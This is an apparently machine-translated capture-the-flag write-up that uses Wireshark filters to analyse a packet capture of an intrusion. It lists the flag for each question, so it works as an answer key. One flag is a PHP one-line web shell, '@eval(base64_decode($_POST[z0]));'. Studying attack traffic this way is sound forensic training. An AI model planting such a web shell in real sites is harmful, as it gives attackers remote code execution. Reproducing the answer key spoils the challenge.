Wirehark packet capture tool commonly used screening command method
Test file: https://pan.baidu.com/s/1QuMdefZHSqlaLSHaMVGb4w
Extraction code: tmjs
-
Use Wireshark to view and analyze the attack.pcapng data packet file, find out the hacker's IP address by analyzing the data packet attack.pcapng, and submit the hacker's IP address as FLAG (form: [IP address]):
Solution:
First filter http The protocol's get parameter and post parameter packets
http.request.method==GET
found two login interface data packets, one is 172.16.1.10 requesting 172.16.1.101, the other is 172.16.1.102 requesting 172.16.1.101, but none Find the user name and password in it, it is estimated that it is a post parameter
http.request.method==POST
. The login user password and password are found in the data packet sent to 172.16.1.101 from 172.16.1.102, so the hacker's ip address is 172.16.1.102
flag{172.16.1.102} -
Continue to view the packet file attack.pacapng, analyze which ports the hacker scanned, and use all ports as FLAG (form: [port name 1, port name 2, port name 3..., port name n]) from low to high Submit:
Solution:
Filternmap扫描端口基于tcp协议the data packets whose source ip is 172.16.1.102 and use tcp protocol ( ).
ip.src==172.16.1.102&&tcp
See the scanned interfaces are 21, 80, 23, 3389, 445, 5007. For details
on the traffic of nmap scanning ports, see this article
flag{ 21, 23, 80, 445, 3389, 5007} -
Continue to look at the data package file attack.pacapng to analyze what the hacker's final user name is, and submit the user name as FLAG (form: [user name]):
Solution: In the
first step, the user name and password are found in the 3745 package
flag{Lancelot} -
Continue to check the data packet file attack.pacapng to analyze what the hacker finally obtained the password, and submit the password as FLAG (form: [password]):
Solution:
see the picture of question 3
flag {12369874} -
Continue to check the data packet file attack.pacapng to analyze what is the password for the hacker to connect to the one-sentence Trojan, and submit the one-sentence password as FLAG (form: [one-sentence password]):
Solution: A sentence was found in the 3778 frame of the data packet Trojan horse
flag{@eval(base64_decode($_POST[z0]));} -
Continue to check the data packet file attack.pacapng to analyze what file the hacker downloaded, and submit the file name and suffix as FLAG (form: [file name. suffix name]):
Solution:
First check the get request packet
ip.src==172.16.1.102&&http.request.method==GET
hacker sent by 172.16.1.102 SQL injection was performed on the index.php interface, and upload.php was visited to
see the upload.php interface of the post parameter. The upload.php interface
ip.src==172.16.1.102&&http.request.method==POST
visited C: \ \phpstudy\ \wiw \ \fittingroom\ lupload\flag.zip, and the download was flag. zip
flag{flag.zip} -
Continue to check the data packet file attack.pacapng to extract the file downloaded by the hacker, and submit the content in the file as FLAG (form: [file content]):
Solution:
Right-click the data packet in question 6, trace the tcp stream, and save Raw data, then open the
flag{Manners maketh man}